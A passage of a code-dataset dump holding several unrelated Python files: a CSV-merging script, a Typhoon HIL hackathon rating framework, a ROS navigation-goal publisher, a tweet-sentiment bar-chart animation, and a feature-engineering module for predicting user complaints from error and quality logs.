r'D:\\\\Program_code\\\\python\\\\Code_test\\\\stock_gap_NLP\\\\classification_report_combine' # use your path\r\n# all_files = glob.glob(path +'\\\\'+ '*.csv')\r\n# print(k)\r\np=twolist_to_list(k)\r\nprint(p)\r\nprint(len(p))\r\nli = []\r\n\r\nfor filename in p:\r\n df = pd.read_csv(filename, index_col=None, header=0)\r\n li.append(df)\r\n# print(li)\r\nframe = pd.concat(li, axis=0, ignore_index=True)\r\nframe.drop(['Unnamed: 0'], inplace=True, axis=1)\r\n# drop_duplicates returns a new frame, so the result must be assigned back\r\nframe = frame.drop_duplicates()\r\n# print(frame)\r\npath1=r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\Classification_method.csv'# method: normal\r\n# path1=r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\stopword_Classification_method.csv'# method:stopword\r\nremove_save_file(frame,path1)\r\n # print(df)\r\nos.remove(r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\Classification_method.csv')\r\nframe.to_csv(r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\Classification_method.csv')\r\n\r\n\r\n \r\n \r\n\r\n\r\n# 
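What appears to be an earlier dated dump of the combined frame, kept for reference:\r\n# 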
frame.to_csv(r'D:\\\\Program_code\\\\python\\\\Code_test\\\\stock_gap_NLP\\\\combineall_2019-12-23.csv')","sub_path":"Stock_gap_NLP/code/combine_classification_report.py","file_name":"combine_classification_report.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"636733613","text":"\"\"\"This module represents Typhoon HIL framework that is used for\ntesting and rating of solutions.\n\n\"\"\"\nfrom multiprocessing import Process\n\nimport json\nfrom hackathon.utils.utils import *\nfrom hackathon.energy.rating import get_physics_metrics\n\nfrom hackathon.framework.http_server import run as http_server_run\nfrom hackathon.framework.http_server import prepare_dot_dir\nimport generate_profiles as gp\n\n__author__ = \"Novak Boskov\"\n__copyright__ = \"Typhoon HIL Inc.\"\n__license__ = \"MIT\"\n\n\ndef rater(socket: zmq.Socket, poller: zmq.Poller, data_msg: DataMessage) \\\n -> None:\n \"\"\"Calculate time spent by the solution in current cycle and physics\n mark for data_msg (if returned). Calculated data is being written\n in results file.\n\n \"\"\"\n start = time.time()\n # poller.poll blocks until message is sent or for passed\n # milliseconds if message is not sent\n msgs = dict(poller.poll(\n None if CFG.DBGPhysics else CFG.max_results_wait * 1000))\n spent = time.time() - start\n\n if socket in msgs and msgs[socket] == zmq.POLLIN:\n solution_response = socket.recv_pyobj().validate()\n\n match = True\n if solution_response.data_msg.id != data_msg.id:\n match = False\n spent = CFG.max_results_wait\n\n if CFG.DBG:\n print('DBG: {} {} received after {}s.'\n .format('ADEQUATE' if match else 'INADEQUATE',\n solution_response, spent))\n\n write_a_result(\n *get_physics_metrics(data_msg, solution_response, spent, match),\n data_msg)\n elif CFG.DBG:\n print('DBG: results are not sent in predefined interval of {}s.'\n .format(CFG.max_results_wait))\n\n\ndef run(args) -> None:\n prepare_dot_dir()\n gp.generate_profiles()\n config_outs(args, 'framework')\n\n data_emit_socket, _ = bind_pub_socket(CFG.in_address, CFG.in_port)\n result_gather_socket, _ = bind_sub_socket(CFG.out_address, CFG.out_port)\n results_poll = zmq.Poller()\n results_poll.register(result_gather_socket, zmq.POLLIN)\n\n # Run http server in separate process\n http = Process(target=http_server_run, args=())\n http.start()\n\n # Create results file, truncate if exists\n with open(CFG.results, 'w'):\n pass\n\n # Create results dump file, truncate if exists\n with open(CFG.results_dump, 'w'):\n pass\n\n # Open profile file\n with open(CFG.profile_file, 'r') as f:\n profile = json.load(f)\n\n print('Profile file from {} has loaded...'.format(CFG.profile_file))\n\n print('Loading physics initialization file')\n with open(CFG.physics_init, 'r') as f:\n ini = json.load(f)\n\n lapse_time = CFG.framework_lapse_time or 1\n print('Framework is booting with the lapse time of {}s ...'\n .format(lapse_time))\n time.sleep(lapse_time)\n\n for i, rec in enumerate(profile):\n if i == 0:\n soc_bess, overload, mg, current_power = ini['bessSOC'], \\\n ini['bessOverload'], \\\n ini['mainGridPower'], \\\n ini['bessPower']\n else:\n last = get_latest_result()\n soc_bess, overload, mg, current_power = last['bessSOC'], \\\n last['bessOverload'], \\\n last['mainGridPower'], \\\n last['bessPower']\n\n data = DataMessage(i,\n rec['gridStatus'], rec['buyingPrice'],\n rec['sellingPrice'], rec['currentLoad'],\n rec['solarProduction'],\n soc_bess, overload, mg, 
current_power)\n\n if CFG.DBG:\n print('Framework emits {}'.format(data))\n\n data_emit_socket.send_pyobj(data)\n rater(result_gather_socket, results_poll, data)\n\n # Send terminating message to the solution\n data_emit_socket.send_pyobj(False)\n\n # Write results json from dump\n with open(CFG.results, 'w') as f:\n json.dump(read_results(), f)\n\n if CFG.shutdown_http_server:\n # Gracefully terminate HTTP server process that serves results\n # to visualization web page\n time.sleep(2)\n http.terminate()\n print('Simple HTTP server has stopped.')\n else:\n print('Simple HTTP server is still running...')\n","sub_path":"hackathon/framework/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"602396723","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import PoseStamped, Quaternion\nfrom tf.transformations import quaternion_from_euler\n\nclass Navigation(object):\n def __init__(self):\n rospy.init_node('publish_nav_cmd')\n self.pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)\n\n def setGoal(self):\n ps = PoseStamped()\n ps.header.stamp = rospy.Time.now()\n ps.header.frame_id = \"map\"\n ps.pose.position.x = 10.0\n ps.pose.position.y = 10.0\n q = quaternion_from_euler(0.0 ,0.0 ,0.0)\n ps.pose.orientation = Quaternion(q[0], q[1], q[2], q[3])\n self.pub.publish(ps)\n\n\nif __name__ == '__main__':\n try:\n nav = Navigation()\n rate = rospy.Rate(100.0)\n while not rospy.is_shutdown():\n nav.setGoal()\n rate.sleep()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Error rospy\")\n finally:\n rospy.loginfo(\"Publish_nav_cmd stopped\")\n","sub_path":"src/publish_nav_cmd.py","file_name":"publish_nav_cmd.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497267556","text":"\r\nfrom matplotlib import style\r\nimport matplotlib.animation as animation\r\n\r\nstyle.use(\"ggplot\")\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nwidth = 0.6\r\n\r\n\r\nfig, ax = plt.subplots()\r\n\r\n\r\ndef animate(i):\r\n \r\n data = open(\"twitter_output.txt\",\"r\").read()\r\n results = data.split('\\n')\r\n pos_occurence = results.count(\"pos\")\r\n neg_occurence = results.count(\"neg\")\r\n trash_occurence = results.count(\"trash\")\r\n total_tweets = len(results) \r\n \r\n rects1 = ax.bar(5, pos_occurence, width, color='g')\r\n\r\n rects3 = ax.bar(7, trash_occurence, width, color='#808080')\r\n rects2 = ax.bar(9, neg_occurence, width, color='r')\r\n\r\n \r\n\r\n ax.legend(['Positive: '+'%.2f' % ((pos_occurence/total_tweets)*100)+' %','Trashed: '+'%.2f' % ((trash_occurence/total_tweets)*100)+' %' , 'Negative: '+'%.2f' % ((neg_occurence/total_tweets)*100)+' %'],loc='center',fontsize='x-large' )\r\n ax.set_title('SCANNED TWEETS: '+str(total_tweets))\r\n \r\n#ind = np.arange(5,11,5) # the x locations for the groups\r\n # the width of the bars\r\n\r\nplt.ylabel('NO. 
OF TWEETS')\r\n\r\n\r\nani = animation.FuncAnimation(fig, animate, interval=1000)\r\n\r\n\r\n\r\n\r\n\r\n\r\n# add some text for labels, title and axes ticks\r\n\r\n\r\n#ax.set_xticks(ind + width/2)\r\n#ax.set_xticklabels(('Positive','Negative'))\r\n#plt.xticks( (6,11), ('Positive','Negative') )\r\n\r\n\r\n\r\n\r\n\r\n#autolabel(rects2)\r\n\r\nplt.show()\r\n\r\n\r\n","sub_path":"plot_bar.py","file_name":"plot_bar.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"490368489","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport pickle\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom tqdm import tqdm\nimport gc\nimport random\nimport lightgbm as lgb\nimport re\nfrom sklearn.metrics import *\nfrom sklearn.model_selection import KFold\nimport warnings\nfrom collections import Counter, defaultdict\nwarnings.filterwarnings(action='ignore')\n\nfrom gensim.models import KeyedVectors\n\nfrom scipy.stats import skew\nfrom scipy.stats import norm, kurtosis\n\ndef make_datetime_day(x):\n # convert the string-typed Time column to a datetime\n x = str(x)\n # print(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n hour = int(x[8:10])\n #min = int(x[10:12])\n #sec = int(x[12:])\n return dt.datetime(year, month, day, hour)\n\ndef dataset_trans2(df, types, Num_df_user, Num_errtype, First_index, fwver_total):\n num_df_user = Num_df_user\n num_errtype =Num_errtype\n first_index = First_index\n \n df2 = df.copy()\n \n df2['time_second'] = df2['time'].apply(make_datetime_second)\n \n \n \n df2['hour'] =df2.time_second.dt.hour\n\n\n df2 = df2.loc[(df2.time_second >=pd.to_datetime('2020-11-01 00:00:00')) & (df2.time_second <=pd.to_datetime('2020-11-30 23:59:59'))]\n #datas = df[['user_id','errtype','hour']]\n #df_=datas[['user_id','hour','errtype']].count().to_frame().reset_index()\n df_=df2.groupby(['user_id','hour','errtype']).count().reset_index()\n #df_ =df_.sort_values(['user_id','hour']).rename(columns = {0:'counts'}).reset_index(drop=True)\n\n\n day_data = np.zeros((num_df_user,42,24))\n for i in range(24):\n # after the groupby().count(), the 'time' column simply holds the count\n dfa = df_.loc[df_['hour']==i][['user_id','errtype','time']].values\n for inx , val1 ,val2 in tqdm(dfa):\n day_data[:,:,i][inx-first_index,val1-1] = val2\n\n m2=day_data.mean(axis=2)\n std2=day_data.std(axis=2) \n m2_max = day_data.max(axis=2)\n #m2_1=day_data.max(axis=2)\n \n df2['day'] =df2.time_second.dt.day\n\n\n df2 = df2.loc[(df2.time_second >=pd.to_datetime('2020-11-01 00:00:00')) & (df2.time_second <=pd.to_datetime('2020-11-30 23:59:59'))]\n #datas = df[['user_id','errtype','day']]\n #df_=datas[['user_id','day','errtype']].count().to_frame().reset_index()\n df_=df2.groupby(['user_id','day','errtype']).count().reset_index()\n #df_ =df_.sort_values(['user_id','day']).rename(columns = {0:'counts'}).reset_index(drop=True)\n\n\n day_data = np.zeros((num_df_user,42,30))\n for i in range(30):\n dfa = df_.loc[df_['day']==(i+1)][['user_id','errtype','time']].values\n for inx , val1 ,val2 in tqdm(dfa):\n day_data[:,:,i][inx-first_index,val1-1] = val2\n\n m3=day_data.mean(axis=2)\n std3=day_data.std(axis=2) \n m3_max = day_data.max(axis=2)\n #m3_1=day_data.max(axis=2)\n \n return [m2, std2,m2_max, m3, std3,m3_max]\n\n\n\ndef f_pr_auc(probas_pred, y_true):\n labels=y_true.get_label()\n p, r, _ = precision_recall_curve(labels, probas_pred)\n score=auc(r,p) \n 
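# LightGBM custom-metric contract: return (name, value, is_higher_better).\n # auc(r, p) integrates precision over (decreasing) recall, i.e. PR-AUC, so\n # higher is better; hooked in as, e.g., lgb.train(params, dtrain, feval=f_pr_auc).\n 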
return \"pr_auc\", score, True\n\n\ndef mk_err_feature(df,user_num,user_min,complainer_48h_errcode_unique_testtrain,no_complainer_48h_errcode_unique_testtrain):\n model = KeyedVectors.load_word2vec_format('errtype_w2v')\n df['typecode'] = df.errtype.astype(str) + df.errcode.astype(str)\n id_err_var = df[['user_id','typecode','errtype','fwver','errcode','model_nm']].values\n\n # 빈 array 생성\n typecode_arr = np.zeros((user_num,3))\n type_arr = np.zeros((user_num,47))\n fwver_arr = np.zeros((user_num,14))\n code_arr = np.zeros((user_num, 17))\n type_w2v_arr = np.zeros((user_num, 32))\n\n for idx, typecode,type, fwver, code, model in tqdm(id_err_var):\n\n # type + code\n if typecode in ['101','23connection fail to establish']:\n typecode_arr[idx - user_min,0] += 1\n elif typecode in ['40','332','261','141','151','161','111','121']:\n typecode_arr[idx - user_min,1] += 1\n\n typecode_arr[idx - user_min,2] = (typecode_arr[idx - user_min,0])/(typecode_arr[idx - user_min,1]+1)\n \n # errtype\n type_arr[idx - user_min,type - 1] += 1\n\n if type in [25,18,20,19,21]:\n type_arr[idx - user_min,42] += 1\n elif type in [34,10,35,13,30,27,28]:\n type_arr[idx - user_min,43] += 1\n elif type in [2,4,42,26]:\n type_arr[idx - user_min,44] += 1\n elif type in [1,8]:\n type_arr[idx - user_min,45] += 1\n type_arr[idx - user_min,46] = (type_arr[idx - user_min,42])/(type_arr[idx - user_min,45]+1) \n\n # lst = []\n # for type in id_err_var[id_err_var.user_id==idx].errtype:\n # lst.append(model.wv.get_vector(str(type)))\n\n # type_w2v_arr[idx-user_min] = np.array(lst).mean(axis=0)\n\n # fwver\n fwver_dict = {'05.15.2138':0,'04.22.1750':1,'04.33.1261':2,'04.16.3553':3,'03.11.1167':4,'04.22.1778':5,'04.22.1684':6,'04.33.1185':7,'04.16.3571':8}\n try:\n fwver_arr[idx-user_min,fwver_dict[fwver]] += 1\n except:\n fwver_arr[idx-user_min,9] += 1\n\n if fwver in ['04.33.1149','04.73.2571','04.16.3571']:\n fwver_arr[idx-user_min,10] += 1\n elif fwver in ['05.15.2120','10']:\n fwver_arr[idx-user_min,11] += 1\n elif fwver in ['04.73.2237','04.22.1684','05.15.2138']:\n fwver_arr[idx-user_min,12] += 1\n fwver_arr[idx - user_min,13] = (fwver_arr[idx-user_min,10])/(fwver_arr[idx-user_min,12]+1)\n\n # errcode\n errcode_top14 = ['1', '0', 'connection timeout', 'B-A8002', '80', '79', '14', 'active','2', '84', '85', 'standby', 'NFANDROID2','connection fail to establish']\n if code in errcode_top14:\n code_arr[idx-user_min,errcode_top14.index(code)] += 1\n elif code in list(complainer_48h_errcode_unique_testtrain)+['5','6','V-21008','terminate by peer user']:\n code_arr[idx-user_min,14] += 1\n # elif code in ['H-51042','connection fail to establish','4','14','13','83','3','connection timeout']:\n # code_arr[idx-user_min,15] += 1\n elif code in list(no_complainer_48h_errcode_unique_testtrain)+['Q-64002','S-65002','0']:\n code_arr[idx-user_min,15] += 1\n code_arr[idx-user_min,16] = (code_arr[idx-user_min,14])/(code_arr[idx-user_min,15]+1)\n\n\n # 변수 평균 분산 추가\n type_mean = type_arr[:,42:].mean(axis=1)\n type_std = type_arr[:,42:].std(axis=1)\n\n typecode_mean = typecode_arr.mean(axis=1)\n typecode_std = typecode_arr.std(axis=1)\n\n fwver_arr_mean = fwver_arr[:,9:].mean(axis=1)\n fwver_arr_std = fwver_arr[:,9:].std(axis=1)\n\n code_mean = code_arr[:,:14].mean(axis=1)\n code_std = code_arr[:,:14].std(axis=1)\n\n mean_var = 
np.concatenate((type_mean.reshape(-1,1),type_std.reshape(-1,1),typecode_mean.reshape(-1,1),typecode_std.reshape(-1,1),fwver_arr_mean.reshape(-1,1),fwver_arr_std.reshape(-1,1),code_mean.reshape(-1,1),code_std.reshape(-1,1)),axis=1)\n\n return np.concatenate((typecode_arr,type_arr,fwver_arr,code_arr),axis=1)\n\n\ndef mk_qt_feature(df,vars,user_num,user_min):\n\n for qual_num in list(map(lambda x: 'quality_'+ x, [str(i) for i in range(13)])):\n df[qual_num] = df[qual_num].apply(lambda x: float(x.replace(\",\",\"\")) if type(x) == str else x)\n\n q1 = np.zeros((user_num,6))\n q2 = np.zeros((user_num,6))\n q3 = np.zeros((user_num,1))\n qt_cnt = df.groupby('user_id').count()['time']/12\n dict = {key:value for key,value in zip(qt_cnt.index,qt_cnt.values)}\n for i in range(user_num):\n if i+user_min in dict.keys():\n q3[i,0] = dict[i+user_min]\n\n # quality_0,1,2,6,8,11,12 are nearly identical, as are 5,7,9,10; average each group and use that\n for i, var in enumerate(vars):\n id_q = df[['user_id',var]].values\n res = np.zeros((user_num,6))\n\n for idx, num in tqdm(id_q):\n if num == 0:\n res[int(idx)-user_min,0] += 1\n elif num == -1:\n res[int(idx)-user_min,1] += 1\n elif num == 1:\n res[int(idx)-user_min,2] += 1\n elif num == 2:\n res[int(idx)-user_min,3] += 1\n elif num == 3:\n res[int(idx)-user_min,4] += 1\n else:\n res[int(idx)-user_min,5] += 1\n q1 += res\n\n qt_mean = q1.mean(axis=1)\n qt_var = q1.std(axis=1)\n\n # q1 = q1/q1.sum(axis=1).shape(-1,1)\n \n return np.concatenate((q1/11,q3,qt_mean.reshape(-1,1),qt_var.reshape(-1,1)),axis=1)\n\n\n\ndef make_datetime(x):\n # convert the string-typed Time column to a datetime\n x = str(x)\n # print(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n hour = int(x[8:10])\n # min = int(x[10:12])\n # sec = int(x[12:])\n return dt.datetime(year, month, day, hour)\n\n\n\ndef mk_time_feature(df, user_num, user_min,err_mode=True):\n # hour segments: 4 counts + 4 ratios = 8 features\n # day-of-week buckets: 4 counts + 4 ratios = 8 features\n # for err data: 6 per-day error statistics\n # qual: 16 features / err: 22 features\n df['time'] = df['time'].map(lambda x: make_datetime(x))\n\n # df[\"hour\"] = df[\"time\"].dt.hour\n df[\"dayofweek\"] = df[\"time\"].dt.dayofweek\n\n # # hour\n # hour_error = df[['user_id', 'hour']].values\n # hour = np.zeros((user_num, 24))\n #\n # for person_idx, hr in tqdm(hour_error):\n # hour[person_idx - user_min, hr - 1] += 1\n\n df[\"hour\"] = df[\"time\"].dt.hour\n conditionlist = [\n (df['hour'] >= 11) & (df['hour'] < 14),\n (df['hour'] >= 14) & (df['hour'] < 20),\n (df['hour'] >= 20) & (df['hour'] < 24) | (df['hour'] == 0)]\n\n choicelist = [0, 1, 2] # lunch :0, Afternoon:1 , Night : 2, others : 3\n df['hour_segment'] = np.select(conditionlist, choicelist, default=3)\n\n df_time_err = pd.concat([df['user_id'], df['hour_segment']], axis=1).values\n\n hour_err = np.zeros((user_num, 8))\n\n print('hour_Err shape', hour_err.shape)\n print('train_time_err shape', df_time_err.shape)\n\n for person_idx, hr in tqdm(df_time_err):\n # hour_segment is already 0-based (0..3), so index the count columns directly\n hour_err[person_idx - user_min, hr] += 1\n\n hour_err_sum = np.sum(hour_err, axis=1)\n\n for num in range(4):\n hour_err[:, num + 4] = hour_err[:, num] / hour_err_sum\n \n df_hour = pd.DataFrame(hour_err)\n df_hour = df_hour.fillna(0)\n\n hour_err = df_hour.values\n\n # day\n day_error = df[['user_id', 'dayofweek']].values\n day = np.zeros((user_num, 4))\n\n for person_idx, d in tqdm(day_error):\n # elif chain so one row is counted in exactly one bucket\n if d == 1:\n day[person_idx - user_min, 0] += 1\n elif d == 5:\n day[person_idx - user_min, 1] += 1\n elif d == 6:\n day[person_idx - user_min, 2] += 1\n else:\n day[person_idx - user_min, 3] += 1\n\n df_day = 
pd.DataFrame(day, columns=['Mon', 'Sat', 'Sun', 'others'])\n df_day['all'] = df_day['Mon'] + df_day['Sat'] + df_day['Sun'] + df_day['others']\n\n for var in ['Mon', 'Sat', 'Sun', 'others']:\n df_day[var + '_pct'] = df_day[var] / df_day['all']\n\n del df_day['all']\n df_day = df_day.fillna(0)\n\n df_day_val = df_day.values\n if err_mode :\n err_date = df.groupby([df['user_id'],df['time'].dt.date]).size().reset_index(name='counts')\n err_time_stat = err_date.groupby('user_id').agg({'counts': [np.min, np.max, np.mean, np.std, skew,np.size]}).reset_index()\n err_time_stat.columns = ['user_id', 'time_min', 'time_max', 'time_mean', 'time_std', 'time_skew','time_count']\n err_time_stat.time_std = err_time_stat.time_std.fillna(0)\n if user_min>10000:\n err_time_stat.loc[-1] = [43262, 0, 0, 0,0,0,0] # adding a row\n err_time_stat.index = err_time_stat.index + 1 # shifting index\n err_time_stat = err_time_stat.sort_values(by='user_id') # sorting by index\n err_time_stat.drop('user_id', axis=1, inplace=True)\n err_time_val = err_time_stat.values\n\n return np.concatenate((hour_err, df_day_val,err_time_val), axis=1)\n else:\n return np.concatenate((hour_err, df_day_val), axis=1)\n\n\n\n## fwver_count\ndef mk_fwver_feature(df,user_num,user_min):\n df = df.groupby(['user_id', 'model_nm'])\n user_id_fwver_count = df['fwver'].describe()\n fwver_array = np.array(user_id_fwver_count.unique)\n fwver_count = np.zeros((user_num, 1))\n \n id = 0\n for user_id, model_nm in tqdm(user_id_fwver_count.index):\n fwver_count[user_id-user_min,0] += fwver_array[id]\n id +=1\n \n return fwver_count\n\n\n\n\n\n\ndef make_date(x):\n # convert the string-typed Time column to a date\n x = str(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n return dt.datetime(year, month, day)\n\n\n\ndef fill_quality_missing(df_err, df_quality):\n # df_err['time_day'] = df_err['time'].map(lambda x : make_date(x))\n # df_quality['time_day'] = df_err['time'].map(lambda x : make_date(x))\n\n # # fill in missing fwver values\n # for i in len(df_quality[df_quality['fwver'].isna()]):\n # df_quality[df_quality['fwver'].isna()][i]['fwver'] = df_err[(df_err['user_id'] == df_quality[df_quality['fwver'].isna()][i]['user_id']) & (df_err['time_day'] ==df_quality[df_quality['fwver'].isna()][i]['time_day'])]['fwver'][0]\n\n\n # fill missing quality_n values; fillna returns a copy, so assign it back\n qual_list = ['quality_0', 'quality_1', 'quality_2', 'quality_5', 'quality_6', 'quality_7', 'quality_8', 'quality_9', 'quality_11', 'quality_12']\n for i in qual_list:\n df_quality[i] = df_quality[i].fillna(0)\n\n df_quality['quality_10'] = df_quality['quality_10'].fillna(3)\n \n return df_quality\n\n\ndef err_count(df,user_num, df_cat):\n if df_cat == 'train':\n n_total_train = df.groupby('user_id')['user_id'].count()\n #print(n_total_train.shape)\n output= np.array(n_total_train).reshape(user_num,1)\n else:\n n_total_test = df.groupby('user_id')['user_id'].count()\n total_test_list = n_total_test.tolist()\n total_test_list.insert(13262,0)\n output= np.array(total_test_list).reshape(user_num,1)\n #test_x3.shape\n \n return output\n\n\ndef qua_count(df,user_num, user_min,qt_id, noqt_id):\n qua_count = df.groupby('user_id')['user_id'].count()/12\n qua_count_mean = qua_count.mean()\n qua_count_list = [0 for i in range(user_num)]\n \n id=0\n for i in qt_id:\n i = i-user_min\n qua_count_list[i] = qua_count.iloc[id]\n id+=1\n for i in noqt_id:\n i = i-user_min\n qua_count_list[i] = qua_count_mean\n return np.array(qua_count_list).reshape(user_num,1)\n\n\ndef tfidf(train=True):\n if train:\n with open(\"train_errtype_Text.pickle\",\"rb\") as fr:\n lst = pickle.load(fr)\n 
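# Assumption: each pickled entry is one user's space-joined errtype string,\n # i.e. one 'document' per user for the TfidfVectorizer below.\n 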
else:\n with open(\"test_errtype_Text.pickle\",\"rb\") as fr:\n lst = pickle.load(fr)\n\n tfidf_vectorizer = TfidfVectorizer()\n X = tfidf_vectorizer.fit_transform(lst)\n\n return X.toarray()\n\n\ndef make_datetime_second(x):\n # string 타입의 Time column을 datetime 타입으로 변경\n x = str(x)\n # print(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n hour = int(x[8:10])\n min = int(x[10:12])\n sec = int(x[12:])\n return dt.datetime(year, month, day, hour, min, sec)\n\n\n\ndef dataset_trans(df, types, Num_df_user, Num_errtype, First_index, fwver_total):\n num_df_user = Num_df_user\n num_errtype =Num_errtype\n first_index = First_index\n \n \n fwver_total_dic ={}\n for v in range(len(fwver_total)):\n fwver_total_dic[sorted(list(fwver_total))[v]] = v+1\n\n def fwver_tran(x):\n return fwver_total_dic[x]\n\n\n df['ver_num'] = df['fwver'].apply(fwver_tran)\n #\n fwver_np = np.zeros((num_df_user,5))\n\n v3=df[['user_id','ver_num']]\n getdf =~(v3 == v3.shift(1))\n logical =(getdf.user_id.apply(int) + getdf.ver_num.apply(int)) > 0\n fwver_num=v3[logical]\n\n fwver_num = fwver_num.reset_index(drop=True)\n count =np.zeros(len(fwver_num),dtype=int)\n\n for v in range(1,len(fwver_num)):\n if fwver_num.user_id.values[v-1] ==fwver_num.user_id.values[v]:\n count[v] = count[v-1] +1\n\n\n fwver_num['count'] =count\n fw_v = fwver_num.loc[fwver_num['count'].isin([0,1,2,3,4])].pivot(index='user_id',columns='count').reset_index().fillna(0).values\n fw_v =fw_v.astype('int64')\n\n \n for inx, v1,v2,v3,v4,v5 in tqdm(fw_v):\n fwver_np[inx-first_index,0] =v1\n fwver_np[inx-first_index,1] =v2\n fwver_np[inx-first_index,2] =v3\n fwver_np[inx-first_index,3] =v4\n fwver_np[inx-first_index,4] =v5\n #print(fwver_np.shape)\n #print(model_n.shape)\n \n target_df = df\n first_num = first_index\n count_num =num_df_user\n\n dp = target_df[['user_id','model_nm','fwver']]\n unique_data =target_df[(dp !=dp.shift(1)).sum(axis=1)>0]\n\n dp2 = target_df[['user_id','model_nm']]\n unique_data2 =target_df[(dp2 !=dp2.shift(1)).sum(axis=1)>0]\n\n fwver_total_dic ={}\n for v in range(len(fwver_total)):\n fwver_total_dic[sorted(list(fwver_total))[v]] = v+1\n \n def fwver_tran(x):\n return fwver_total_dic[x]\n\n fwver = np.zeros((count_num,24))\n for idx in tqdm(unique_data.user_id.unique()):\n df_md =unique_data2.loc[unique_data2.user_id==idx].model_nm.values\n df_fw = unique_data.loc[unique_data.user_id==idx].fwver.values\n\n for md in range(len(df_md)):\n fwver[idx-first_num,md] = int(df_md[md][-1])+1\n\n for l in range(3,len(df_fw)+3):\n fwver[idx-first_num,l] =fwver_total_dic[df_fw[l-3]]\n\n fw_df = pd.DataFrame(fwver).reset_index().rename(columns={'index':'user_id'})\n\n fwver_total_dic_rev = {v: k for k, v in fwver_total_dic.items()}\n fwver_total_dic_rev2 = fwver_total_dic_rev.copy()\n fwver_total_dic_rev[0] =0\n fwver_total_dic_rev2[0] = '04.22.1750' #max 값\n\n\n def fwver_tras_reverse(x):\n return fwver_total_dic_rev[x]\n\n def fwver_tras_reverse2(x):\n return fwver_total_dic_rev2[x]\n\n fw_df[3] =fw_df[3].apply(fwver_tras_reverse2)\n fw_df[4] =fw_df[4].apply(fwver_tras_reverse)\n fw_df[5] =fw_df[5].apply(fwver_tras_reverse)\n fw_df[6] =fw_df[6].apply(fwver_tras_reverse)\n fw_df[7] =fw_df[7].apply(fwver_tras_reverse)\n\n\n fw_df = fw_df.rename(columns={0:'md1',1:'md2',2:'md3',3:'fw1',4:'fw2',5:'fw3',6:'fw4',7:'fw5'})\n fw_df['user_id'] =fw_df['user_id']+10000\n\n pre_df=fw_df.iloc[:,:9]\n\n md_flow = {str(x.astype(\"int\")):(i+1) for i,x in 
enumerate(pre_df[['md1','md2','md3']].drop_duplicates().reset_index(drop=True).values)}\n fw_flow = {str(x):(i+1) for i,x in enumerate(pre_df[['fw1','fw2','fw3','fw4','fw5']].drop_duplicates().reset_index(drop=True).values)}\n\n \n def fw_change_counter(x):\n fwlst = []\n for v in ['fw1','fw2','fw3','fw4','fw5']:\n if x[v] ==0:\n pass\n else:\n fwlst +=[x[v]]\n\n if len(fwlst) ==len(list(set(fwlst))):\n return 0\n else:\n return 1\n\n\n def md_flow_change(x):\n return md_flow[str(x[['md1','md2','md3']].values.astype(\"int\"))]\n\n def fw_flow_change(x):\n return fw_flow[str(x[['fw1','fw2','fw3','fw4','fw5']].values)]\n \n def mean_str_fw_dum(x):\n fwlst = []\n for v in ['fw1','fw2','fw3','fw4','fw5']:\n if x[v] ==0:\n pass\n else:\n fwlst +=[int(x[v].replace('.',\"\"))]\n return np.array(fwlst).mean()\n\n\n\n def std_str_fw_dum(x):\n fwlst = []\n for v in ['fw1','fw2','fw3','fw4','fw5']:\n if x[v] ==0:\n pass\n else:\n fwlst +=[int(x[v].replace('.',\"\"))]\n return np.array(fwlst).std()\n\n pre_df=fw_df.iloc[:,:9]\n #pre_df['md_counts'] = pre_df[['md1','md2','md3']].astype('bool').sum(axis=1)\n #pre_df['fw_counts'] = pre_df[['fw1','fw2','fw3','fw4','fw5']].astype('bool').sum(axis=1)\n\n pre_df['fw_change'] = pre_df.apply(fw_change_counter,axis=1)\n pre_df['fw_flows'] = pre_df.apply(fw_flow_change,axis=1)\n pre_df['md_flows'] = pre_df.apply(md_flow_change,axis=1)\n \n ## mean, std 추가해볼만하다.\n pre_df['fw_mean'] = pre_df.apply(mean_str_fw_dum,axis=1)\n pre_df['fw_std'] = pre_df.apply(std_str_fw_dum,axis=1)\n fw_model_flow =pre_df.iloc[:,9:].values\n \n \n first_num = first_index\n count_num =num_df_user\n \n time_term = np.zeros((count_num,4))\n \n df['time_second'] = df['time'].apply(make_datetime_second)\n tre_t =df[['user_id','time_second']].drop_duplicates()\n\n for v in tqdm(tre_t.user_id.unique()):\n test =tre_t.loc[tre_t.user_id ==v].time_second\n if len(test) <=2:\n time_term[v-first_num,0] = 0\n time_term[v-first_num,1] = 0\n time_term[v-first_num,2] = test.values[-1]-test.values[0]\n time_term[v-first_num,3] = len(test)\n else:\n time_term[v-first_num,0] = (test -test.shift(1)).max().total_seconds()\n time_term[v-first_num,1] = (test -test.shift(1)).min().total_seconds()\n time_term[v-first_num,2] = test.values[-1]-test.values[0] \n time_term[v-first_num,3] = len(test)\n\n dft = pd.DataFrame(time_term).copy()\n\n dft[0] =dft[0]/3600\n dft[2] =dft[2]/3600/24/10e8\n dft[2] =np.where(dft[2].values==0,1,dft[2].values)\n dft[4] =dft[0]/dft[3]\n dft[4] = dft[0]/dft[3]*3600\n dft[5] = dft[0]/24/dft[2]\n time_term = dft.fillna(0).values\n \n 